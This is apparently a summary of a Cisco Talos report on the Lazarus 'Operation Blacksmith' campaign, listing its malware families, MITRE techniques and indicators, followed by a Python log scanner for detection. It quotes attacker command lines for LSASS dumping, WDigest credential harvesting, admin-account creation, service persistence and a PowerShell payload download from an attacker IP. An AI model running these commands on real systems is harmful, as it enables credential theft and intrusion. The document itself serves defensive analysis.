Keypoints
- Cisco Talos identified "Operation Blacksmith," a Lazarus campaign using three DLang-based malware families: NineRAT (Telegram C2 RAT), DLRAT (RAT/downloader) and BottomLoader (downloader).
- Initial access was achieved via exploitation of CVE-2021-44228 (Log4Shell) on public-facing servers (e.g., VMware Horizon), followed by deployment of custom implants and HazyLoad reverse proxy.
- NineRAT is modular (dropper → instrumentor nsIookup.exe → payload), uses Telegram bots/channels for C2 (getMe, sendDocument, getFile) and supports file upload/download and numerous remote commands.
- Persistence and execution techniques include service creation via sc create, BAT scripts, Startup .URL files, and creation of a local administrative account for hands-on-keyboard activity.
- BottomLoader uses hardcoded URLs and PowerShell (Invoke-WebRequest, UploadFile) to retrieve and upload payloads and can persist by creating a .URL in the Startup folder.
- DLRAT shares a hardcoded session ID observed previously in MagicRAT and performs reconnaissance, file transfer, download, rename, sleep and self-delete commands via multipart C2 posts.
- Talos published extensive IOCs (file hashes, domains, IPs, file names, Telegram bot) and detection guidance; IOCs are available in their GitHub repository.
MITRE Techniques
- [T1082] System Information Discovery – Used by implants to fingerprint hosts via commands like "whoami", "ipconfig /all" and "wmic os get osarchitecture" ("cmd.exe /C ipconfig /all", "whoami").
- [T1518] Software Discovery – Malware queries installed security products using WMIC to detect antivirus ("WMIC /Node:localhost /Namespace:root\SecurityCenter2 Path AntiVirusProduct Get displayName").
- [T1003.005] OS Credential Dumping: WDigest – Actors read or enable WDigest to harvest credentials ("Reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest", "reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1").
- [T1003] Credential Dumping – Operators run credential tools and memory dumps to harvest credentials ("procdump.exe -accepteula -ma lsass.exe lsass.dmp", "pwdump.exe //Mimikatz").
- [T1112] Modify Registry – Used to change registry keys to enable credential harvesting (see "reg add … UseLogonCredential").
- [T1136] Create Account – The attackers create a local admin user for persistence and hands-on-keyboard activity ("net user krtbgt /add", "net localgroup Administrators krtbgt /add").
- [T1033] User Discovery – The campaign enumerates local and domain user/group info ("cmd.exe /c net localgroup Administrators", "net user").
Indicators of Compromise
- [File Hashes] Malware file hashes â NineRAT example: 534f5612954db99c86baa67ef51a3ad88bc21735bce7bb591afa8a4317c35433; HazyLoad: 000752074544950ae9020a35ccd77de277f1cd5026b4b9559279dc3b86965eee (and 10 more hashes).
- [Domains / URLs] C2 and payload hosts â tech[.]micrsofts[.]com, tech[.]micrsofts[.]tech and hxxp://27[.]102[.]113[.]93/inet[.]txt.
- [IP Addresses] Network IOCs used for hosting and C2 â 27[.]102[.]113[.]93, 201[.]77[.]179[.]66 (and additional IPs listed in the report).
- [File Names] Dropper/instrumentor and payload filenames – nsIookup.exe (instrumentor; the capital "I" stands in for the "l" of nslookup.exe), wininet64.exe / inetmgr.exe (HazyLoad/loader names used in commands).
- [Telegram] Telegram C2 artifacts – public bot "@StudyJ001Bot" (initially used) and other operator-owned bot tokens/channels referenced in NineRAT configuration.
Operation Blacksmith's technical flow begins with exploitation of CVE-2021-44228 on exposed services, followed by scripted reconnaissance and payload retrieval. Operators run discovery commands (whoami, ipconfig /all, wmic queries), download and execute the HazyLoad reverse proxy via PowerShell (e.g., (New-Object System.Net.WebClient).DownloadFile("hxxp:///inet.txt","c:\windows\adfs\de\inetmgr.exe") and c:\windows\adfs\de\inetmgr.exe -i -p), and in some cases restart HazyLoad with new remote parameters to maintain access. They also create local administrative accounts (net user … /add; net localgroup Administrators … /add) and harvest credentials using procdump and mimikatz-style tools.
NineRAT is delivered via a dropper that writes two embedded components and removes itself; the instrumentor (nsIookup.exe, note the capital "I") sets persistence with a service creation command (sc create Aarsvc_XXXXXX binPath=c:\windows\system32\nsIookup.exe -k AarSvcGroup -p type=own start=auto …) and launches the RAT payload. NineRAT communicates over Telegram using DLang libraries and Telegram API methods (getMe, sendDocument, getFile), supports file transfer and numerous remote commands (e.g., /info, /sendfile, /upgrade, /uninstall), and may use two API tokens for separate channels.
BottomLoader and DLRAT are additional DLang components: BottomLoader downloads next-stage binaries via PowerShell Invoke-WebRequest and can persist by creating a .URL file in the Startup folder to run download commands; it can also upload files using (New-Object System.Net.WebClient).UploadFile. DLRAT performs system fingerprinting (ver, whoami, getmac), posts multipart session data (hardcoded session ID same as MagicRAT), and supports commands for download, upload, rename, sleep and self-deletion. Detection should focus on the PowerShell download/upload strings, service creation entries for nsIookup.exe, Startup .URL artifacts, the listed hashes and the Telegram bot communication patterns.
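The detection guidance above, and the command lines quoted under MITRE Techniques, translate directly into a small set of log rules. The following Python scanner is an added example written for this summary; it is not code from Cisco Talos or from the report. It runs each rule over constructed, Sysmon-style process-creation, file-creation and proxy lines (the two SHA256 values are the ones listed on this page; the Telegram bot token, the service name suffix and the account and file names are made up), flags the nsIookup.exe homoglyph, the sc create persistence entry, the PowerShell DownloadFile/Invoke-WebRequest/UploadFile strings, the WDigest UseLogonCredential change, LSASS dumping, local admin creation, Startup-folder .url files and Bot API calls to api.telegram.org (getMe/sendDocument/getFile), and reports the hashes it matches. The technique IDs tagged on the extra rules (T1036, T1543.003, T1105, T1547.001, T1071.001, T1003.001) are standard ATT&CK IDs, not ones the page itself lists.

```python
import re
from typing import Dict, List

# SHA256 IOCs quoted on this page (NineRAT and HazyLoad samples).
IOC_SHA256 = {
    "534f5612954db99c86baa67ef51a3ad88bc21735bce7bb591afa8a4317c35433",
    "000752074544950ae9020a35ccd77de277f1cd5026b4b9559279dc3b86965eee",
}

# (label, ATT&CK technique, pattern). Patterns follow the command lines quoted in
# the summary. "nsIookup" with capital I never matches the legitimate "nslookup",
# even case-insensitively, because 'I' folds to 'i', not to 'l'.
RULES = [
    ("nsIookup_masquerade", "T1036",
     re.compile(r"nsIookup\.exe", re.I)),
    ("service_nsIookup", "T1543.003",
     re.compile(r"sc\s+create\s+\S+\s+binPath=\S*nsIookup\.exe", re.I)),
    ("powershell_transfer", "T1105",
     re.compile(r"Invoke-WebRequest|\.DownloadFile\(|\.UploadFile\(", re.I)),
    ("wdigest_enable", "T1003.005",
     re.compile(r"SecurityProviders\\WDigest.*?/v\s+UseLogonCredential\b.*?/d\s+1\b", re.I)),
    ("lsass_dump", "T1003.001",
     re.compile(r"procdump(?:64)?\.exe\b.*\s-ma\s+lsass", re.I)),
    ("local_admin_add", "T1136.001",
     re.compile(r"net\s+localgroup\s+Administrators\s+\S+\s+/add", re.I)),
    ("startup_url", "T1547.001",
     re.compile(r"Start Menu\\Programs\\Startup\\[^\\\s]+\.url", re.I)),
    # Telegram Bot API layout: api.telegram.org/bot<id>:<secret>/<method>
    ("telegram_bot_api", "T1071.001",
     re.compile(r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/(?:getMe|sendDocument|getFile)\b")),
]
HEX64 = re.compile(r"\b[0-9a-fA-F]{64}\b")


def scan_line(line: str) -> List[str]:
    """Return the labels of every rule the line trips, plus 'ioc_hash' for a listed SHA256."""
    hits = [label for label, _tech, rx in RULES if rx.search(line)]
    if any(h.lower() in IOC_SHA256 for h in HEX64.findall(line)):
        hits.append("ioc_hash")
    return hits


def scan_log(lines: List[str]) -> Dict[int, List[str]]:
    """Map line index -> labels for every line with at least one hit."""
    return {i: hits for i, hits in ((i, scan_line(l)) for i, l in enumerate(lines)) if hits}


def techniques_hit(lines: List[str]) -> List[str]:
    """Sorted, de-duplicated ATT&CK IDs covered by the findings (hash matches carry none)."""
    by_label = {label: tech for label, tech, _rx in RULES}
    return sorted({by_label[h] for hits in scan_log(lines).values() for h in hits if h in by_label})


# Constructed sample telemetry (not from the report). Only the hashes are real IOCs.
SAMPLE_LOG = [
    r'ProcessCreate Image=C:\Windows\System32\cmd.exe CommandLine="cmd.exe /C ipconfig /all"',
    r'ProcessCreate Image=C:\Windows\System32\sc.exe CommandLine="sc create Aarsvc_123456 binPath=c:\windows\system32\nsIookup.exe -k AarSvcGroup -p type=own start=auto"',
    r'ProcessCreate Image=powershell.exe CommandLine=(New-Object System.Net.WebClient).DownloadFile("hxxp://27[.]102[.]113[.]93/inet[.]txt","c:\windows\adfs\de\inetmgr.exe")',
    r'ProcessCreate Image=reg.exe CommandLine="reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1"',
    r'ProcessCreate Image=net.exe CommandLine="net localgroup Administrators krtbgt /add"',
    r'ProcessCreate Image=procdump.exe CommandLine="procdump.exe -accepteula -ma lsass.exe lsass.dmp"',
    r'FileCreate TargetFilename=C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.url',
    r'ProxyLog dst=api.telegram.org url=https://api.telegram.org/bot1234567890:AAFakeTokenForExample_xx/getMe',
    r'FileHash sha256=534F5612954DB99C86BAA67EF51A3AD88BC21735BCE7BB591AFA8A4317C35433 path=C:\ProgramData\svc.exe',
    r'ProcessCreate Image=C:\Windows\System32\nslookup.exe CommandLine="nslookup example.com"',
]

if __name__ == "__main__":
    for idx, labels in scan_log(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(labels)}")
    print("techniques:", ", ".join(techniques_hit(SAMPLE_LOG)))
```

The benign nslookup.exe line and the plain ipconfig /all discovery line produce no findings; discovery commands on their own are too common to alert on, so the rules key on the persistence, credential-access and C2 artifacts the report singles out.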
Read more: https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/